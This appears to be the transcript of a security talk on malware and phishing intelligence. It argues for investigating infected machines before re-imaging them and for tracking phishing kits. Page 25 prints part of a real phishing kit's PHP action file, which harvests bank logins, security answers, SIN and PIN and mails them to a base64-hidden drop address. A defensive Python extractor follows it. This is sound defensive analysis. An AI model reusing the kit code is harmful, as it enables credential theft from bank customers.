Malware & Phishing Intelligence


Transcript of Malware & Phishing Intelligence

Page 1: Malware & Phishing Intelligence

CONFIDENTIAL 1

Malware & Phishing Intelligence

Page 2

Agenda:

• Malware – “re-image vs. intelligence”

• Phishing – “takedown vs. intelligence”

Page 3

What do you do with an Infected PC?

“Our policy is to re-image the computer. No questions. No exceptions.”

• Does that sound familiar?

• We hear the argument that this is the “safest” option.

• What’s the worst that can happen?

Page 4

What is your Worst Case Scenario?

Global Thermonuclear War?

Page 5

What is your Worst Case Malware Scenario?

Data breach involving Intellectual Property?

Direct Financial Loss?

Data Breach Involving PII?

Page 6

Verizon 2013 Data Breach Investigations Report

Study of 47,000 security incidents with 621 confirmed data breaches: 40% of all data breaches were caused by malware. 47% of those malware attacks originated with an E-mail attachment.

In “Large Enterprises” – 63% of malware attacks originated with an Email attachment.

http://www.verizonenterprise.com/DBIR/2013/

“Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment, and then install additional malware on that and other systems throughout the environment.”

Page 7

The inevitable Click

• How many emails do I have to send your employees to get someone to click on it?

• Three = 50% chance. Ten = “Guaranteed”

ThreatSim.com, quoted in the Verizon DBIR

Page 8

Recent Threats

Page 9

Top malicious spam of August 5, 2013

Page 10

typical

This is what the AV detection looked like for Tuesday morning’s top malicious spam campaign.

Four hours into the campaign, detection 2/46.

Page 11

Same malware, 13 hours later

• Detection rate now 17 vendors detecting

Page 12

ATTACK!

Now what if AFTER all of that happens, we now realize the email had malware in it, and we send a PC tech to format BlueGuy’s machine?

TOP SECRET

Page 13

Long Detect Times

• Mandiant reported in “M-Trends 2013: Attack the Security Gap” that THE MEDIAN NUMBER OF DAYS from evidence of compromise to discovery of compromise was 243 DAYS!

• General Keith Alexander told an audience at Georgia Tech: “Most of the folks who get into the networks are in there for six to nine months before they’re discovered.”

• M-Trends 2013: Attack the Security Gap™, https://www.mandiant.com/resources/m-trends/, March 2013.

• Prince, Brian, “NSA Director: Information-Sharing Critical to U.S. Cybersecurity”, www.darkreading.com/government-vertical/nsa-director-information-sharing-critica/240151955, March 29, 2013.

Page 14

Malware Intelligence

1. What CAN THIS MALWARE DO?

2. Where did it come from?

   a) What was the initial attack vector?

   b) Has that vector contacted any other resource?

3. What does this computer HAVE ACCESS TO?

4. What has the infected computer DONE?

   a) Has the infected computer received additional files?

   b) Has the infected computer exfiltrated data?

   c) Are there any new accounts or files since infection?

   d) Has the infected computer exceeded or attempted to exceed authority on any internal resources?

Page 15

Today’s Top Threat

• Each day we document the behavior of the Top Threat emails

– What is the spam subject?

– What hostile URLs are advertised?

– What hostile attachments are present?

– What network touches does the malware make?

– What additional malware drops if executed?

Page 16

Cyber Intelligence?

“The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.”

http://www.sei.cmu.edu/library/assets/whitepapers/citp-summary-key-findings.pdf

Page 17

Phishing Intelligence

Page 18

http://www.go-polymers.com/components/rbc/index.php

February 27, 2013

Page 19

http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm

February 27, 2013

Page 20

http://www.go-polymers.com/admin/authentication.bns_Scotiabank/authentication.bns.htm

February 22, 2013

Page 21

Phishing Timeline (Takedown View)

• GOAL: Protect customer credentials by improving Takedown speed. Time is Money.

Page 22

Phishing Clusters

• For a single brand, we present the various phishing clusters seen against that brand.

• Phishing sites in the same cluster are composed of highly similar files.

Page 23

Trend Analysis

• By using the Conditional Formatting feature in i2, we can identify “emerging threats”.

In this Conditional Formatting layout, phishing sites that were found in the current month are turned red and enlarged, while older phish are “greyed out”.

Page 24

Phishing Kits

Phishing sites are usually made by hacking an existing website and uploading a set of files necessary to create the look and feel of the brand being imitated.

Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message.

When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.

Page 25

Confirm.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$q1 = $_POST['q1'];
$a1 = $_POST['a1'];
$q2 = $_POST['q2'];
$a2 = $_POST['a2'];
$q3 = $_POST['q3'];
$a3 = $_POST['a3'];
$sin1 = $_POST['sin1'];
$sin2 = $_POST['sin2'];
$sin3 = $_POST['sin3'];
$dobd = $_POST['dobd'];
$dobm = $_POST['dobm'];
$doby = $_POST['doby'];
$dl = $_POST['dl'];
$issue = $_POST['issue'];
$pin = $_POST['pin'];
$email = $_POST['email'];
$emailp = $_POST['emailp'];

$data = "--------- G00dLuck ---------
User: $user
Pass: $pass
-----
Q1: $q1
A1 $a1
Q2: $q2
A2 $a2
Q3: $q3
A3 $a3
----
Dob: $dobd - $dobm - $doby
SIN : $sin1 - $sin2 - $sin3
Dl : $dl
Pin: $pin
Issue: $issue
E-mail: $email / $emailp
--
Ip: $ip
--------- G00dLuck ---------";
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
$emailusr2 = base64_decode('');

$subj = "RBC # $user - $pass - $doby - $dl";

The line the slide highlights:

$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');

Which decodes to: [email protected]

Page 26

Overlaying Drop Email data

• Each red point indicates a criminal’s email.

• More lines = more phishing sites for that email.
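As an added illustration (not code from the deck or from Malcovery’s tooling), the Python below does the two analyst steps from pages 25 and 26: it pulls drop addresses out of recovered kit action files, decoding base64_decode('...') literals the way Confirm.php hides its address, and then groups phishing sites by drop email, which is the “red point with lines” overlay. The kit snippets and URLs are constructed stand-ins, not real sites or kits.

```python
from __future__ import annotations

import base64
import re
from collections import defaultdict

# Constructed sample: action-file source recovered from three phishing sites.
# The PHP is a simplified, hypothetical stand-in, not a real kit.
KITS = {
    "http://example-a.invalid/rbc/confirm.php":
        "$emailusr1 = base64_decode('YWxpY2VAZXhhbXBsZS5jb20='); mail($emailusr1, $subj, $data);",
    "http://example-b.invalid/hsbc/send.php":
        "$to = 'bob@example.com'; mail($to, 'HSBC', $data);",
    "http://example-c.invalid/bns/post.php":
        "$emailusr1 = base64_decode('YWxpY2VAZXhhbXBsZS5jb20='); "
        "$emailusr2 = base64_decode(''); mail($emailusr1, $s, $d);",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Matches the literal argument of base64_decode('...') / base64_decode("...")
B64_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]*)['\"]\s*\)")


def drop_emails(source: str) -> set[str]:
    """Return the drop addresses in one kit action file: plain string literals
    plus any base64_decode('...') literal that decodes to an address."""
    found = set(EMAIL_RE.findall(source))
    for blob in B64_RE.findall(source):
        if not blob:  # unused slot, e.g. $emailusr2 = base64_decode('')
            continue
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: not an address
        found.update(EMAIL_RE.findall(text))
    return found


def overlay(kits: dict[str, str]) -> dict[str, list[str]]:
    """Map each drop email to the phishing sites that use it. One address
    reused across many sites is the 'many lines from one red point' case."""
    by_email: dict[str, list[str]] = defaultdict(list)
    for url, src in kits.items():
        for addr in drop_emails(src):
            by_email[addr].append(url)
    return {addr: sorted(urls) for addr, urls in by_email.items()}


if __name__ == "__main__":
    for addr, sites in overlay(KITS).items():
        print(f"{addr}: {len(sites)} site(s) -> {sites}")
```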

Page 27

Phishing Timeline (Intelligence View)

GOAL: Drive Major Criminals Away from OUR BRAND

Page 28

phishiq.com/submit

• We’re always looking for new sources of phishing or spam data.

• An online form is available, but feel free to contact us if you are a “high volume” contributor.

Page 29

Thank you! Let’s discuss . . .

Gary Warner
www.malcovery.com
@garwarner
@malcovery

Page 30

Additional Discussion points . . .

Page 31

Infected machine

• Sensitive Data Inventory

• What data was ON the machine?

• What data could be ACCESSED FROM the machine?

• Was it accessed? Did it leave?

• Are there additional user accounts?

• What programs / files / DLLs have been added that are not “company standard” in the last 90 days?

• Did this computer attempt any unusual internal resource logins or accesses? (rate / userid / time of day / day of week)

Page 32

Best Case Scenario

• Malware was detected today

• A clear source of infection is readily identifiable from today

• Only a single “unexplained” EXE or DLL is found on the machine, and it matches the signature

• The malware is well understood, widely detected, and has a clear and limited purpose

Page 33

Our Porous Perimeters

• Is the machine mobile?

• Is it “forced VPN” back to our organization?

• If mobile, and if unlimited access – we don’t know what it did at or outside the perimeter because we don’t control the perimeter

• Home network, Starbucks wifi, hotel wifi – data exfil could occur in places where we don’t monitor the network